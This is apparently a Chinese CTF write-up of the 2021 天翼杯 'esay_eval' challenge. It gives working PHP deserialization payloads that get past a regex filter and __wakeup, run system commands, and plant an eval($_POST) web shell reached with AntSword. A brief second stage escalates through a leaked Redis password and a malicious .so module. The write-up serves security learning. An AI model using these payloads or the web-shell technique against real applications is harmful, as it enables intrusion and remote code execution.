[天翼杯 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)

Hillain2023-10-11 3:02

[天翼杯 2021]esay_eval

  • [1 解题流程](#1 解题流程)
    • [1.1 分析](#1.1 分析)
    • [1.2 解题](#1.2 解题)
      • [1.2.1 一阶段](#1.2.1 一阶段)
      • [1.2.2 二阶段](#1.2.2 二阶段)
  • 二、思考总结

题目代码:

php 复制代码 
<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }
}else{
    highlight_file(__FILE__);
}

1 解题流程

1.1 分析

1、看代码,有unserialize函数,说明要反序列化

2、有 eval($this->code) ,说明要RCE

3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);,说明要绕过waf

4、A的wakeup里面会把code置空,所以要绕过

起点:B(destruct)  终点:A(call)

链条:B(destruct::a=$a)-> A(call::code=命令)

1.2 解题

1.2.1 一阶段

  1. 构造序列化代码(根据waf,传输的内容不能带有大写AB,所以把代码都用小写ab表示)

    php 复制代码 
    <?php
class a{
    public $code = "phpinfo();";
}
class b{
    function __destruct(){
        echo $this->a->a();
    }
}
$a = new a();
$b = new b();
$b->a = $a;
echo serialize($b);

    得到:O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}

  2. 绕过wakeup

    得到:O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}

  3. 传参得到

  4. 构造序列化代码(输出flag)

    php 复制代码 
    	<?php
	class a{
	    public $code = "system('ls');";
	}
	class b{
	    function __destruct(){
	        echo $this->a->a();
	    }
	}
	$a = new a();
	$b = new b();
	$b->a = $a;
	echo serialize($b);
	
	得到:O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:13:"system('ls');";}}
	改为:O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:13:"system('ls');";}}

    发现页面无法执行,说明肯定有限制了,不然不会不输出

  5. 查看disable_function

    原来是这里限制了,那么需要改变战略,直接上传个一句话试试

  6. 构造序列化代码(一句话)

    php 复制代码 
    	<?php
	class a{
	    //public $code = '<?php @eval($_POST["pwd"]) ?>';
	    public $code = '@eval($_POST["pwd"]);';
	}
	class b{
	    function __destruct(){
	        echo $this->a->a();
	    }
	}
	$a = new a();
	$b = new b();
	$b->a = $a;
	echo serialize($b);
	
	得到:O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:21:"@eval($_POST["pwd"]);";}}
	改为:O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:21:"@eval($_POST["pwd"]);";}}

    蚁剑成功连接

1.2.2 二阶段

这里有两种不同的解法:

  1. disabled_function绕过
  2. AS_Redis绕过
    连接后查看config.php.swp,密码you_cannot_guess_it,同时上传exp.so
    使用redis插件连接,执行命令即可

二、思考总结

这道题目有个很有意思的地方,eval执行命令为什么不能显示?这个问题一开始给我搞蒙圈了,知道phpinfo可以执行的时候,突然想到我们不当当可以把phpinfo当做测试命令去看有没有回显,更可以去看phpinfo里面的配置,查看配置很可能就是解题的关键!

相关推荐
github_czy1 小时前
(k8s)k8s部署mysql与redis(无坑版)
redis·容器·kubernetes
qq_243050796 小时前
irpas:互联网路由协议攻击套件!全参数详细教程!Kali Linux入门教程!黑客渗透测试!
linux·网络·web安全·网络安全·黑客·渗透测试·系统安全
知行EDI7 小时前
EDI安全:2025年数据保护与隐私威胁应对策略
安全·edi·电子数据交换·知行软件
等一场春雨8 小时前
CentOS 安装Redis
linux·redis·centos
tuan_zhang10 小时前
第17章 安全培训筑牢梦想根基
人工智能·安全·工业软件·太空探索·战略欺骗·算法攻坚
IpdataCloud10 小时前
如何提升IP地址查询数据服务的安全?
网络·tcp/ip·安全
天天向上杰10 小时前
简识Redis 持久化相关的 “Everysec“ 策略
数据库·redis·缓存
清风-云烟12 小时前
使用redis-cli命令实现redis crud操作
java·linux·数据库·redis·spring·缓存·1024程序员节
draymond710712 小时前
redis-redission的加锁源码与看门狗机制
redis
热门推荐
01xgboost: Why not implement distributed XGBoost on top of spark02Dell服务器升级ubuntu 22.04失败解决03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04ChatGPT + Stable Diffusion + 百度AI + MoviePy 实现文字生成视频,小说转视频,自媒体神器!(二)05(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明06密码学原理技术-第六章-introduction to pulibc-key cryptography07JS设计模式之中介者模式08Windows10安装PCL1.14.0及点云配准09优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间10leetcode - 1769. Minimum Number of Operations to Move All Balls to Each Box